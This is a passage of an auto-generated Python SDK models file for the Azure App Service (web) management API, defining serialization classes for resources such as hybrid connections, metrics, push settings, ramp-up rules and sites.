'send_key_name': {'readonly': True},
'send_key_value': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'send_key_name': {'key': 'properties.sendKeyName', 'type': 'str'},
'send_key_value': {'key': 'properties.sendKeyValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(HybridConnectionKey, self).__init__(**kwargs)
self.send_key_name = None
self.send_key_value = None
class HybridConnectionLimits(ProxyOnlyResource):
"""Hybrid Connection limits contract. This is used to return the plan limits of Hybrid Connections.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:ivar current: The current number of Hybrid Connections.
:vartype current: int
:ivar maximum: The maximum number of Hybrid Connections allowed.
:vartype maximum: int
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'current': {'readonly': True},
'maximum': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'current': {'key': 'properties.current', 'type': 'int'},
'maximum': {'key': 'properties.maximum', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(HybridConnectionLimits, self).__init__(**kwargs)
self.current = None
self.maximum = None
class IpSecurityRestriction(msrest.serialization.Model):
"""IP security restriction on an app.
All required parameters must be populated in order to send to Azure.
:param ip_address: Required. IP address the security restriction is valid for.
:type ip_address: str
:param subnet_mask: Subnet mask for the range of IP addresses the restriction is valid for.
:type subnet_mask: str
"""
_validation = {
'ip_address': {'required': True},
}
_attribute_map = {
'ip_address': {'key': 'ipAddress', 'type': 'str'},
'subnet_mask': {'key': 'subnetMask', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(IpSecurityRestriction, self).__init__(**kwargs)
self.ip_address = kwargs['ip_address']
self.subnet_mask = kwargs.get('subnet_mask', None)
class LocalizableString(msrest.serialization.Model):
"""Localizable string object containing the name and a localized value.
:param value: Non-localized name.
:type value: str
:param localized_value: Localized name.
:type localized_value: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'localized_value': {'key': 'localizedValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LocalizableString, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.localized_value = kwargs.get('localized_value', None)
class ManagedServiceIdentity(msrest.serialization.Model):
"""Managed service identity.
Variables are only populated by the server, and will be ignored when sending a request.
:param type: Type of managed service identity. Possible values include: "SystemAssigned".
:type type: str or ~azure.mgmt.web.v2016_09_01.models.ManagedServiceIdentityType
:ivar tenant_id: Tenant of managed service identity.
:vartype tenant_id: str
:ivar principal_id: Principal Id of managed service identity.
:vartype principal_id: str
"""
_validation = {
'tenant_id': {'readonly': True},
'principal_id': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'principal_id': {'key': 'principalId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ManagedServiceIdentity, self).__init__(**kwargs)
self.type = kwargs.get('type', None)
self.tenant_id = None
self.principal_id = None
class MetricAvailabilily(msrest.serialization.Model):
"""Metric availability and retention.
:param time_grain: Time grain.
:type time_grain: str
:param retention: Retention period for the current time grain.
:type retention: str
"""
_attribute_map = {
'time_grain': {'key': 'timeGrain', 'type': 'str'},
'retention': {'key': 'retention', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MetricAvailabilily, self).__init__(**kwargs)
self.time_grain = kwargs.get('time_grain', None)
self.retention = kwargs.get('retention', None)
class MetricDefinition(ProxyOnlyResource):
"""Metadata for a metric.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:ivar name_properties_name: Name of the metric.
:vartype name_properties_name: str
:ivar unit: Unit of the metric.
:vartype unit: str
:ivar primary_aggregation_type: Primary aggregation type.
:vartype primary_aggregation_type: str
:ivar metric_availabilities: List of time grains supported for the metric together with
retention period.
:vartype metric_availabilities: list[~azure.mgmt.web.v2016_09_01.models.MetricAvailabilily]
:ivar display_name: Friendly name shown in the UI.
:vartype display_name: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'name_properties_name': {'readonly': True},
'unit': {'readonly': True},
'primary_aggregation_type': {'readonly': True},
'metric_availabilities': {'readonly': True},
'display_name': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name_properties_name': {'key': 'properties.name', 'type': 'str'},
'unit': {'key': 'properties.unit', 'type': 'str'},
'primary_aggregation_type': {'key': 'properties.primaryAggregationType', 'type': 'str'},
'metric_availabilities': {'key': 'properties.metricAvailabilities', 'type': '[MetricAvailabilily]'},
'display_name': {'key': 'properties.displayName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(MetricDefinition, self).__init__(**kwargs)
self.name_properties_name = None
self.unit = None
self.primary_aggregation_type = None
self.metric_availabilities = None
self.display_name = None
class NameValuePair(msrest.serialization.Model):
"""Name value pair.
:param name: Pair name.
:type name: str
:param value: Pair value.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NameValuePair, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.value = kwargs.get('value', None)
class NetworkAccessControlEntry(msrest.serialization.Model):
"""Network access control entry.
:param action: Action object. Possible values include: "Permit", "Deny".
:type action: str or ~azure.mgmt.web.v2016_09_01.models.AccessControlEntryAction
:param description: Description of network access control entry.
:type description: str
:param order: Order of precedence.
:type order: int
:param remote_subnet: Remote subnet.
:type remote_subnet: str
"""
_attribute_map = {
'action': {'key': 'action', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'order': {'key': 'order', 'type': 'int'},
'remote_subnet': {'key': 'remoteSubnet', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NetworkAccessControlEntry, self).__init__(**kwargs)
self.action = kwargs.get('action', None)
self.description = kwargs.get('description', None)
self.order = kwargs.get('order', None)
self.remote_subnet = kwargs.get('remote_subnet', None)
class Operation(msrest.serialization.Model):
"""An operation on a resource.
:param id: Operation ID.
:type id: str
:param name: Operation name.
:type name: str
:param status: The current status of the operation. Possible values include: "InProgress",
"Failed", "Succeeded", "TimedOut", "Created".
:type status: str or ~azure.mgmt.web.v2016_09_01.models.OperationStatus
:param errors: Any errors associate with the operation.
:type errors: list[~azure.mgmt.web.v2016_09_01.models.ErrorEntity]
:param created_time: Time when operation has started.
:type created_time: ~datetime.datetime
:param modified_time: Time when operation has been updated.
:type modified_time: ~datetime.datetime
:param expiration_time: Time when operation will expire.
:type expiration_time: ~datetime.datetime
:param geo_master_operation_id: Applicable only for stamp operation ids.
:type geo_master_operation_id: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'errors': {'key': 'errors', 'type': '[ErrorEntity]'},
'created_time': {'key': 'createdTime', 'type': 'iso-8601'},
'modified_time': {'key': 'modifiedTime', 'type': 'iso-8601'},
'expiration_time': {'key': 'expirationTime', 'type': 'iso-8601'},
'geo_master_operation_id': {'key': 'geoMasterOperationId', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.id = kwargs.get('id', None)
self.name = kwargs.get('name', None)
self.status = kwargs.get('status', None)
self.errors = kwargs.get('errors', None)
self.created_time = kwargs.get('created_time', None)
self.modified_time = kwargs.get('modified_time', None)
self.expiration_time = kwargs.get('expiration_time', None)
self.geo_master_operation_id = kwargs.get('geo_master_operation_id', None)
class PushSettings(ProxyOnlyResource):
"""Push settings for the App.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:param is_push_enabled: Gets or sets a flag indicating whether the Push endpoint is enabled.
:type is_push_enabled: bool
:param tag_whitelist_json: Gets or sets a JSON string containing a list of tags that are
whitelisted for use by the push registration endpoint.
:type tag_whitelist_json: str
:param tags_requiring_auth: Gets or sets a JSON string containing a list of tags that require
user authentication to be used in the push registration endpoint.
Tags can consist of alphanumeric characters and the following:
'_', '@', '#', '.', ':', '-'.
Validation should be performed at the PushRequestHandler.
:type tags_requiring_auth: str
:param dynamic_tags_json: Gets or sets a JSON string containing a list of dynamic tags that
will be evaluated from user claims in the push registration endpoint.
:type dynamic_tags_json: str
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'is_push_enabled': {'key': 'properties.isPushEnabled', 'type': 'bool'},
'tag_whitelist_json': {'key': 'properties.tagWhitelistJson', 'type': 'str'},
'tags_requiring_auth': {'key': 'properties.tagsRequiringAuth', 'type': 'str'},
'dynamic_tags_json': {'key': 'properties.dynamicTagsJson', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PushSettings, self).__init__(**kwargs)
self.is_push_enabled = kwargs.get('is_push_enabled', None)
self.tag_whitelist_json = kwargs.get('tag_whitelist_json', None)
self.tags_requiring_auth = kwargs.get('tags_requiring_auth', None)
self.dynamic_tags_json = kwargs.get('dynamic_tags_json', None)
class RampUpRule(msrest.serialization.Model):
"""Routing rules for ramp up testing. This rule allows to redirect static traffic % to a slot or to gradually change routing % based on performance.
:param action_host_name: Hostname of a slot to which the traffic will be redirected if decided
to. E.g. myapp-stage.azurewebsites.net.
:type action_host_name: str
:param reroute_percentage: Percentage of the traffic which will be redirected to
:code:`<code>ActionHostName</code>`.
:type reroute_percentage: float
:param change_step: In auto ramp up scenario this is the step to add/remove from
:code:`<code>ReroutePercentage</code>` until it reaches
:code:`<code>MinReroutePercentage</code>` or :code:`<code>MaxReroutePercentage</code>`. Site
metrics are checked every N minutes specified in :code:`<code>ChangeIntervalInMinutes</code>`.
Custom decision algorithm can be provided in TiPCallback site extension which URL can be
specified in :code:`<code>ChangeDecisionCallbackUrl</code>`.
:type change_step: float
:param change_interval_in_minutes: Specifies interval in minutes to reevaluate
ReroutePercentage.
:type change_interval_in_minutes: int
:param min_reroute_percentage: Specifies lower boundary above which ReroutePercentage will
stay.
:type min_reroute_percentage: float
:param max_reroute_percentage: Specifies upper boundary below which ReroutePercentage will
stay.
:type max_reroute_percentage: float
:param change_decision_callback_url: Custom decision algorithm can be provided in TiPCallback
site extension which URL can be specified. See TiPCallback site extension for the scaffold and
contracts.
https://www.siteextensions.net/packages/TiPCallback/.
:type change_decision_callback_url: str
:param name: Name of the routing rule. The recommended name would be to point to the slot which
will receive the traffic in the experiment.
:type name: str
"""
_attribute_map = {
'action_host_name': {'key': 'actionHostName', 'type': 'str'},
'reroute_percentage': {'key': 'reroutePercentage', 'type': 'float'},
'change_step': {'key': 'changeStep', 'type': 'float'},
'change_interval_in_minutes': {'key': 'changeIntervalInMinutes', 'type': 'int'},
'min_reroute_percentage': {'key': 'minReroutePercentage', 'type': 'float'},
'max_reroute_percentage': {'key': 'maxReroutePercentage', 'type': 'float'},
'change_decision_callback_url': {'key': 'changeDecisionCallbackUrl', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RampUpRule, self).__init__(**kwargs)
self.action_host_name = kwargs.get('action_host_name', None)
self.reroute_percentage = kwargs.get('reroute_percentage', None)
self.change_step = kwargs.get('change_step', None)
self.change_interval_in_minutes = kwargs.get('change_interval_in_minutes', None)
self.min_reroute_percentage = kwargs.get('min_reroute_percentage', None)
self.max_reroute_percentage = kwargs.get('max_reroute_percentage', None)
self.change_decision_callback_url = kwargs.get('change_decision_callback_url', None)
self.name = kwargs.get('name', None)
class RequestsBasedTrigger(msrest.serialization.Model):
"""Trigger based on total requests.
:param count: Request Count.
:type count: int
:param time_interval: Time interval.
:type time_interval: str
"""
_attribute_map = {
'count': {'key': 'count', 'type': 'int'},
'time_interval': {'key': 'timeInterval', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(RequestsBasedTrigger, self).__init__(**kwargs)
self.count = kwargs.get('count', None)
self.time_interval = kwargs.get('time_interval', None)
class ResourceCollection(msrest.serialization.Model):
"""Collection of resources.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[str]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[str]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class ResourceMetric(msrest.serialization.Model):
"""Object representing a metric for any resource .
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: Name of metric.
:vartype name: ~azure.mgmt.web.v2016_09_01.models.ResourceMetricName
:ivar unit: Metric unit.
:vartype unit: str
:ivar time_grain: Metric granularity. E.g PT1H, PT5M, P1D.
:vartype time_grain: str
:ivar start_time: Metric start time.
:vartype start_time: ~datetime.datetime
:ivar end_time: Metric end time.
:vartype end_time: ~datetime.datetime
:ivar resource_id: Metric resource Id.
:vartype resource_id: str
:ivar id: Resource Id.
:vartype id: str
:ivar metric_values: Metric values.
:vartype metric_values: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricValue]
:ivar properties: Resource metric properties collection.
:vartype properties: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricProperty]
"""
_validation = {
'name': {'readonly': True},
'unit': {'readonly': True},
'time_grain': {'readonly': True},
'start_time': {'readonly': True},
'end_time': {'readonly': True},
'resource_id': {'readonly': True},
'id': {'readonly': True},
'metric_values': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'ResourceMetricName'},
'unit': {'key': 'unit', 'type': 'str'},
'time_grain': {'key': 'timeGrain', 'type': 'str'},
'start_time': {'key': 'startTime', 'type': 'iso-8601'},
'end_time': {'key': 'endTime', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'id': {'key': 'id', 'type': 'str'},
'metric_values': {'key': 'metricValues', 'type': '[ResourceMetricValue]'},
'properties': {'key': 'properties', 'type': '[ResourceMetricProperty]'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetric, self).__init__(**kwargs)
self.name = None
self.unit = None
self.time_grain = None
self.start_time = None
self.end_time = None
self.resource_id = None
self.id = None
self.metric_values = None
self.properties = None
class ResourceMetricAvailability(msrest.serialization.Model):
"""Metrics availability and retention.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar time_grain: Time grain .
:vartype time_grain: str
:ivar retention: Retention period for the current time grain.
:vartype retention: str
"""
_validation = {
'time_grain': {'readonly': True},
'retention': {'readonly': True},
}
_attribute_map = {
'time_grain': {'key': 'timeGrain', 'type': 'str'},
'retention': {'key': 'retention', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricAvailability, self).__init__(**kwargs)
self.time_grain = None
self.retention = None
class ResourceMetricCollection(msrest.serialization.Model):
"""Collection of metric responses.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetric]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ResourceMetric]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class ResourceMetricDefinition(ProxyOnlyResource):
"""Metadata for the metrics.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:ivar type: Resource type.
:vartype type: str
:ivar name_properties_name: Name of the metric.
:vartype name_properties_name: ~azure.mgmt.web.v2016_09_01.models.ResourceMetricName
:ivar unit: Unit of the metric.
:vartype unit: str
:ivar primary_aggregation_type: Primary aggregation type.
:vartype primary_aggregation_type: str
:ivar metric_availabilities: List of time grains supported for the metric together with
retention period.
:vartype metric_availabilities:
list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricAvailability]
:ivar resource_uri: Resource URI.
:vartype resource_uri: str
:ivar id_properties_id: Resource ID.
:vartype id_properties_id: str
:ivar properties: Resource metric definition properties.
:vartype properties: dict[str, str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'name_properties_name': {'readonly': True},
'unit': {'readonly': True},
'primary_aggregation_type': {'readonly': True},
'metric_availabilities': {'readonly': True},
'resource_uri': {'readonly': True},
'id_properties_id': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name_properties_name': {'key': 'properties.name', 'type': 'ResourceMetricName'},
'unit': {'key': 'properties.unit', 'type': 'str'},
'primary_aggregation_type': {'key': 'properties.primaryAggregationType', 'type': 'str'},
'metric_availabilities': {'key': 'properties.metricAvailabilities', 'type': '[ResourceMetricAvailability]'},
'resource_uri': {'key': 'properties.resourceUri', 'type': 'str'},
'id_properties_id': {'key': 'properties.id', 'type': 'str'},
'properties': {'key': 'properties.properties', 'type': '{str}'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricDefinition, self).__init__(**kwargs)
self.name_properties_name = None
self.unit = None
self.primary_aggregation_type = None
self.metric_availabilities = None
self.resource_uri = None
self.id_properties_id = None
self.properties = None
class ResourceMetricDefinitionCollection(msrest.serialization.Model):
"""Collection of metric definitions.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param value: Required. Collection of resources.
:type value: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricDefinition]
:ivar next_link: Link to next page of resources.
:vartype next_link: str
"""
_validation = {
'value': {'required': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ResourceMetricDefinition]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricDefinitionCollection, self).__init__(**kwargs)
self.value = kwargs['value']
self.next_link = None
class ResourceMetricName(msrest.serialization.Model):
"""Name of a metric for any resource .
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: metric name value.
:vartype value: str
:ivar localized_value: Localized metric name value.
:vartype localized_value: str
"""
_validation = {
'value': {'readonly': True},
'localized_value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'localized_value': {'key': 'localizedValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricName, self).__init__(**kwargs)
self.value = None
self.localized_value = None
class ResourceMetricProperty(msrest.serialization.Model):
"""Resource metric property.
:param key: Key for resource metric property.
:type key: str
:param value: Value of pair.
:type value: str
"""
_attribute_map = {
'key': {'key': 'key', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricProperty, self).__init__(**kwargs)
self.key = kwargs.get('key', None)
self.value = kwargs.get('value', None)
class ResourceMetricValue(msrest.serialization.Model):
"""Value of resource metric.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar timestamp: Value timestamp.
:vartype timestamp: str
:ivar average: Value average.
:vartype average: float
:ivar minimum: Value minimum.
:vartype minimum: float
:ivar maximum: Value maximum.
:vartype maximum: float
:ivar total: Value total.
:vartype total: float
:ivar count: Value count.
:vartype count: float
:ivar properties: Resource metric properties collection.
:vartype properties: list[~azure.mgmt.web.v2016_09_01.models.ResourceMetricProperty]
"""
_validation = {
'timestamp': {'readonly': True},
'average': {'readonly': True},
'minimum': {'readonly': True},
'maximum': {'readonly': True},
'total': {'readonly': True},
'count': {'readonly': True},
'properties': {'readonly': True},
}
_attribute_map = {
'timestamp': {'key': 'timestamp', 'type': 'str'},
'average': {'key': 'average', 'type': 'float'},
'minimum': {'key': 'minimum', 'type': 'float'},
'maximum': {'key': 'maximum', 'type': 'float'},
'total': {'key': 'total', 'type': 'float'},
'count': {'key': 'count', 'type': 'float'},
'properties': {'key': 'properties', 'type': '[ResourceMetricProperty]'},
}
def __init__(
self,
**kwargs
):
super(ResourceMetricValue, self).__init__(**kwargs)
self.timestamp = None
self.average = None
self.minimum = None
self.maximum = None
self.total = None
self.count = None
self.properties = None
class Site(Resource):
"""A web app, a mobile app backend, or an API app.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:param location: Required. Resource Location.
:type location: str
:ivar type: Resource type.
:vartype type: str
:param tags: A set of tags. Resource tags.
:type tags: dict[str, str]
:param identity: Managed service identity.
:type identity: ~azure.mgmt.web.v2016_09_01.models.ManagedServiceIdentity
:ivar state: Current state of the app.
:vartype state: str
:ivar host_names: Hostnames associated with the app.
:vartype host_names: list[str]
:ivar repository_site_name: Name of the repository site.
:vartype repository_site_name: str
:ivar usage_state: State indicating whether the app has exceeded its quota usage. Read-only.
Possible values include: "Normal", "Exceeded".
:vartype usage_state: str or ~azure.mgmt.web.v2016_09_01.models.UsageState
:param enabled: :code:`<code>true</code>` if the app is enabled; otherwise,
:code:`<code>false</code>`. Setting this value to false disables the app (takes the app
offline).
:type enabled: bool
:ivar enabled_host_names: Enabled hostnames for the app.Hostnames need to be assigned (see
HostNames) AND enabled. Otherwise,
the app is not served on those hostnames.
:vartype enabled_host_names: list[str]
:ivar availability_state: Management information availability state for the app. Possible
values include: "Normal", "Limited", "DisasterRecoveryMode".
:vartype availability_state: str or ~azure.mgmt.web.v2016_09_01.models.SiteAvailabilityState
:param host_name_ssl_states: Hostname SSL states are used to manage the SSL bindings for app's
hostnames.
:type host_name_ssl_states: list[~azure.mgmt.web.v2016_09_01.models.HostNameSslState]
:param server_farm_id: Resource ID of the associated App Service plan, formatted as:
"/subscriptions/{subscriptionID}/resourceGroups/{groupName}/providers/Microsoft.Web/serverfarms/{appServicePlanName}".
:type server_farm_id: str
:param reserved: :code:`<code>true</code>` if reserved; otherwise, :code:`<code>false</code>`.
:type reserved: bool
:ivar last_modified_time_utc: Last time the app was modified, in UTC. Read-only.
:vartype last_modified_time_utc: ~datetime.datetime
:param site_config: Configuration of the app.
:type site_config: ~azure.mgmt.web.v2016_09_01.models.SiteConfig
:ivar traffic_manager_host_names: Azure Traffic Manager hostnames associated with the app.
Read-only.
:vartype traffic_manager_host_names: list[str]
:param scm_site_also_stopped: :code:`<code>true</code>` to stop SCM (KUDU) site when the app is
stopped; otherwise, :code:`<code>false</code>`. The default is :code:`<code>false</code>`.
:type scm_site_also_stopped: bool
:ivar target_swap_slot: Specifies which deployment slot this app will swap into. Read-only.
:vartype target_swap_slot: str
:param hosting_environment_profile: App Service Environment to use for the app.
:type hosting_environment_profile: ~azure.mgmt.web.v2016_09_01.models.HostingEnvironmentProfile
:param client_affinity_enabled: :code:`<code>true</code>` to enable client affinity;
:code:`<code>false</code>` to stop sending session affinity cookies, which route client
requests in the same session to the same instance. Default is :code:`<code>true</code>`.
:type client_affinity_enabled: bool
:param client_cert_enabled: :code:`<code>true</code>` to enable client certificate
authentication (TLS mutual authentication); otherwise, :code:`<code>false</code>`. Default is
:code:`<code>false</code>`.
:type client_cert_enabled: bool
:param host_names_disabled: :code:`<code>true</code>` to disable the public hostnames of the
app; otherwise, :code:`<code>false</code>`.
If :code:`<code>true</code>`, the app is only accessible via API management process.
:type host_names_disabled: bool
:ivar outbound_ip_addresses: List of IP addresses that the app uses for outbound connections
(e.g. database access). Includes VIPs from tenants that site can be hosted with current
settings. Read-only.
:vartype outbound_ip_addresses: str
:ivar possible_outbound_ip_addresses: List of IP addresses that the app uses for outbound
connections (e.g. database access). Includes VIPs from all tenants. Read-only.
:vartype possible_outbound_ip_addresses: str
:param container_size: Size of the function container.
:type container_size: int
:param daily_memory_time_quota: Maximum allowed daily memory-time quota (applicable on dynamic
apps only).
:type daily_memory_time_quota: int
:ivar suspended_till: App suspended till in case memory-time quota is exceeded.
:vartype suspended_till: ~datetime.datetime
:ivar max_number_of_workers: Maximum number of workers.
This only applies to Functions container.
:vartype max_number_of_workers: int
:param cloning_info: If specified during app creation, the app is cloned from a source app.
:type cloning_info: ~azure.mgmt.web.v2016_09_01.models.CloningInfo
:param snapshot_info: If specified during app creation, the app is created from a previous
snapshot.
:type snapshot_info: ~azure.mgmt.web.v2016_09_01.models.SnapshotRecoveryRequest
:ivar resource_group: Name of the resource group the app belongs to. Read-only.
:vartype resource_group: str
:ivar is_default_container: :code:`<code>true</code>` if the app is a default container;
otherwise, :code:`<code>false</code>`.
:vartype is_default_container: bool
:ivar default_host_name: Default hostname of the app. Read-only.
:vartype default_host_name: str
:ivar slot_swap_status: Status of the last deployment slot swap operation.
:vartype slot_swap_status: ~azure.mgmt.web.v2016_09_01.models.SlotSwapStatus
:param https_only: HttpsOnly: configures a web site to accept only https requests. Issues
redirect for
http requests.
:type https_only: bool
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'location': {'required': True},
'type': {'readonly': True},
'state': {'readonly': True},
'host_names': {'readonly': True},
'repository_site_name': {'readonly': True},
'usage_state': {'readonly': True},
'enabled_host_names': {'readonly': True},
'availability_state': {'readonly': True},
'last_modified_time_utc': {'readonly': True},
'traffic_manager_host_names': {'readonly': True},
'target_swap_slot': {'readonly': True},
'outbound_ip_addresses': {'readonly': True},
'possible_outbound_ip_addresses': {'readonly': True},
'suspended_till': {'readonly': True},
'max_number_of_workers': {'readonly': True},
'resource_group': {'readonly': True},
'is_default_container': {'readonly': True},
'default_host_name': {'readonly': True},
'slot_swap_status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'ManagedServiceIdentity'},
'state': {'key': 'properties.state', 'type': 'str'},
'host_names': {'key': 'properties.hostNames', 'type': '[str]'},
'repository_site_name': {'key': 'properties.repositorySiteName', 'type': 'str'},
'usage_state': {'key': 'properties.usageState', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'enabled_host_names': {'key': 'properties.enabledHostNames', 'type': '[str]'},
'availability_state': {'key': 'properties.availabilityState', 'type': 'str'},
'host_name_ssl_states': {'key': 'properties.hostNameSslStates', 'type': '[HostNameSslState]'},
'server_farm_id': {'key': 'properties.serverFarmId', 'type': 'str'},
'reserved': {'key': 'properties.reserved', 'type': 'bool'},
'last_modified_time_utc': {'key': 'properties.lastModifiedTimeUtc', 'type': 'iso-8601'},
'site_config': {'key': 'properties.siteConfig', 'type': 'SiteConfig'},
'traffic_manager_host_names': {'key': 'properties.trafficManagerHostNames', 'type': '[str]'},
'scm_site_also_stopped': {'key': 'properties.scmSiteAlsoStopped', 'type': 'bool'},
'target_swap_slot': {'key': 'properties.targetSwapSlot', 'type': 'str'},
'hosting_environment_profile': {'key': 'properties.hostingEnvironmentProfile', 'type': 'HostingEnvironmentProfile'},
'client_affinity_enabled': {'key': 'properties.clientAffinityEnabled', 'type': 'bool'},
'client_cert_enabled': {'key': 'properties.clientCertEnabled', 'type': 'bool'},
'host_names_disabled': {'key': 'properties.hostNamesDisabled', 'type': 'bool'},
'outbound_ip_addresses': {'key': 'properties.outboundIpAddresses', 'type': 'str'},
'possible_outbound_ip_addresses': {'key': 'properties.possibleOutboundIpAddresses', 'type': 'str'},
'container_size': {'key': 'properties.containerSize', 'type': 'int'},
'daily_memory_time_quota': {'key': 'properties.dailyMemoryTimeQuota', 'type': 'int'},
'suspended_till': {'key': 'properties.suspendedTill', 'type': 'iso-8601'},
'max_number_of_workers': {'key': 'properties.maxNumberOfWorkers', 'type': 'int'},
'cloning_info': {'key': 'properties.cloningInfo', 'type': 'CloningInfo'},
'snapshot_info': {'key': 'properties.snapshotInfo', 'type': 'SnapshotRecoveryRequest'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'is_default_container': {'key': 'properties.isDefaultContainer', 'type': 'bool'},
'default_host_name': {'key': 'properties.defaultHostName', 'type': 'str'},
'slot_swap_status': {'key': 'properties.slotSwapStatus', 'type': 'SlotSwapStatus'},
'https_only': {'key': 'properties.httpsOnly', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(Site, self).__init__(**kwargs)
self.identity = kwargs.get('identity', None)
self.state = None
self.host_names = None
self.repository_site_name = None
self.usage_state = None
self.enabled = kwargs.get('enabled', None)
